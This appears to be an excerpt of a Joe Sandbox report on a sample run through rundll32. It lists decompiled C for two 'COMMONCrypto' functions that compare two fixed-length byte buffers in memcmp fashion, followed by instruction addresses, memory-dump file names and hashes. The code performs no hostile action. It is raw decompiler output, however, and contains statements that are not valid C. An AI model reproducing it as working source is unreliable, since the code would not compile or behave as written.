Instruction Fuzzy Hash: 0711F671D00218EBDB48DFE9D94A8EEBBB5FB44354F54C189E826A7250D7B42B54CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10012F7C, Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10012F7C(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x10012f7c
0x10012f7c
0x10012f82
0x10013002
0x10013004
0x10013006
0x00000000
0x00000000
0x1001300c
0x10013012
0x10013091
0x10013093
0x10013095
0x00000000
0x00000000
0x1001309b
0x100130a1
0x10013120
0x10013122
0x10013124
0x00000000
0x00000000
0x1001312a
0x10013130
0x100131af
0x100131b1
0x100131b3
0x00000000
0x00000000
0x100131bf
0x1001323f
0x10013241
0x10013243
0x00000000
0x00000000
0x10013249
0x1001324f
0x100132ce
0x100132d0
0x100132d2
0x00000000
0x00000000
0x100132d8
0x100132de
0x1001335d
0x1001335f
0x10013361
0x00000000
0x00000000
0x1001336f
0x10013371
0x10012f54
0x10012f5c
0x10012f5e
0x10012b3a
0x10012b42
0x10012b44
0x10012b55
0x10012b55
0x1001274a
0x100134a6
0x100134a6
0x10012f6b
0x10012f71
0x1001338a
0x1001338a
0x00000000
0x10012f77
0x00000000
0x10012f77
0x10012f71
0x1001337e
0x10013384
0x00000000
0x00000000
0x00000000
0x10013384
0x100132e7
0x100132e9
0x10013300
0x10013308
0x1001330a
0x10013321
0x10013329
0x1001332b
0x10013342
0x1001334a
0x1001334c
0x10013359
0x10013359
0x00000000
0x1001334c
0x10013338
0x1001333c
0x00000000
0x00000000
0x00000000
0x1001333c
0x10013317
0x1001331b
0x00000000
0x00000000
0x00000000
0x1001331b
0x100132f6
0x100132fa
0x00000000
0x00000000
0x00000000
0x100132fa
0x10013258
0x1001325a
0x10013271
0x10013279
0x1001327b
0x10013292
0x1001329a
0x1001329c
0x100132b3
0x100132bb
0x100132bd
0x100132ca
0x100132ca
0x00000000
0x100132bd
0x100132a9
0x100132ad
0x00000000
0x00000000
0x00000000
0x100132ad
0x10013288
0x1001328c
0x00000000
0x00000000
0x00000000
0x1001328c
0x10013267
0x1001326b
0x00000000
0x00000000
0x00000000
0x1001326b
0x100131c9
0x100131cb
0x100131e2
0x100131ea
0x100131ec
0x10013203
0x1001320b
0x1001320d
0x10013224
0x1001322c
0x1001322e
0x1001323b
0x1001323b
0x00000000
0x1001322e
0x1001321a
0x1001321e
0x00000000
0x00000000
0x00000000
0x1001321e
0x100131f9
0x100131fd
0x00000000
0x00000000
0x00000000
0x100131fd
0x100131d8
0x100131dc
0x00000000
0x00000000
0x00000000
0x100131dc
0x10013139
0x1001313b
0x10013152
0x1001315a
0x1001315c
0x10013173
0x1001317b
0x1001317d
0x10013194
0x1001319c
0x1001319e
0x100131ab
0x100131ab
0x00000000
0x1001319e
0x1001318a
0x1001318e
0x00000000
0x00000000
0x00000000
0x1001318e
0x10013169
0x1001316d
0x00000000
0x00000000
0x00000000
0x1001316d
0x10013148
0x1001314c
0x00000000
0x00000000
0x00000000
0x1001314c
0x100130aa
0x100130ac
0x100130c3
0x100130cb
0x100130cd
0x100130e4
0x100130ec
0x100130ee
0x10013105
0x1001310d
0x1001310f
0x1001311c
0x1001311c
0x00000000
0x1001310f
0x100130fb
0x100130ff
0x00000000
0x00000000
0x00000000
0x100130ff
0x100130da
0x100130de
0x00000000
0x00000000
0x00000000
0x100130de
0x100130b9
0x100130bd
0x00000000
0x00000000
0x00000000
0x100130bd
0x1001301b
0x1001301d
0x10013034
0x1001303c
0x1001303e
0x10013055
0x1001305d
0x1001305f
0x10013076
0x1001307e
0x10013080
0x1001308d
0x1001308d
0x00000000
0x10013080
0x1001306c
0x10013070
0x00000000
0x00000000
0x00000000
0x10013070
0x1001304b
0x1001304f
0x00000000
0x00000000
0x00000000
0x1001304f
0x1001302a
0x1001302e
0x00000000
0x00000000
0x00000000
0x10012f84
0x10012f84
0x10012f88
0x10012f8c
0x10012f8e
0x10012fa5
0x10012fa5
0x10012fa9
0x10012fad
0x10012faf
0x10012fc6
0x10012fc6
0x10012fca
0x10012fce
0x10012fd0
0x10012fe7
0x10012fe7
0x10012feb
0x10012fef
0x10012ff1
0x10012ff7
0x10012ffa
0x10012ffe
0x10012ffe
0x00000000
0x10012ff1
0x10012fd6
0x10012fd9
0x10012fdd
0x10012fe1
0x00000000
0x00000000
0x00000000
0x10012fe1
0x10012fb5
0x10012fb8
0x10012fbc
0x10012fc0
0x00000000
0x00000000
0x00000000
0x10012fc0
0x10012f94
0x10012f97
0x10012f9b
0x10012f9f
0x00000000
0x00000000
0x00000000
0x10012f9f
0x10012375
0x10012375
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: f9e13e294cbab063fe1e0fcb414462f8f8cd058b54b4dcbeaf9a264f8c29c0fc
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: CBD14EB3C0E5F30A877AC52D406822EEBA2AFC15C031BC3E1DCE42F299953A9D9495D0

Uniqueness

Uniqueness Score: -1.00%

Function 10012B5C, Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10012B5C(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x10012b5c
0x10012b5c
0x10012b62
0x10012be1
0x10012be3
0x10012be5
0x00000000
0x00000000
0x10012beb
0x10012bf1
0x10012c70
0x10012c72
0x10012c74
0x00000000
0x00000000
0x10012c7a
0x10012c80
0x10012cff
0x10012d01
0x10012d03
0x00000000
0x00000000
0x10012d09
0x10012d0f
0x10012d8e
0x10012d90
0x10012d92
0x00000000
0x00000000
0x10012d98
0x10012d9e
0x10012e1d
0x10012e1f
0x10012e21
0x00000000
0x00000000
0x10012e2d
0x10012ead
0x10012eaf
0x10012eb1
0x00000000
0x00000000
0x10012eb7
0x10012ebd
0x10012f3c
0x10012f3e
0x10012f40
0x00000000
0x00000000
0x10012f4e
0x10012748
0x1001274a
0x100134a6
0x100134a6
0x10012f5c
0x10012f5e
0x10012b3a
0x10012b42
0x10012b44
0x10012b55
0x10012b55
0x00000000
0x10012b44
0x10012f6b
0x10012f71
0x1001338a
0x00000000
0x1001338a
0x00000000
0x10012f77
0x10012ec6
0x10012ec8
0x10012edf
0x10012ee7
0x10012ee9
0x10012f00
0x10012f08
0x10012f0a
0x10012f21
0x10012f29
0x10012f2b
0x10012f38
0x10012f38
0x00000000
0x10012f2b
0x10012f17
0x10012f1b
0x00000000
0x00000000
0x00000000
0x10012f1b
0x10012ef6
0x10012efa
0x00000000
0x00000000
0x00000000
0x10012efa
0x10012ed5
0x10012ed9
0x00000000
0x00000000
0x00000000
0x10012ed9
0x10012e37
0x10012e39
0x10012e50
0x10012e58
0x10012e5a
0x10012e71
0x10012e79
0x10012e7b
0x10012e92
0x10012e9a
0x10012e9c
0x10012ea9
0x10012ea9
0x00000000
0x10012e9c
0x10012e88
0x10012e8c
0x00000000
0x00000000
0x00000000
0x10012e8c
0x10012e67
0x10012e6b
0x00000000
0x00000000
0x00000000
0x10012e6b
0x10012e46
0x10012e4a
0x00000000
0x00000000
0x00000000
0x10012e4a
0x10012da7
0x10012da9
0x10012dc0
0x10012dc8
0x10012dca
0x10012de1
0x10012de9
0x10012deb
0x10012e02
0x10012e0a
0x10012e0c
0x10012e19
0x10012e19
0x00000000
0x10012e0c
0x10012df8
0x10012dfc
0x00000000
0x00000000
0x00000000
0x10012dfc
0x10012dd7
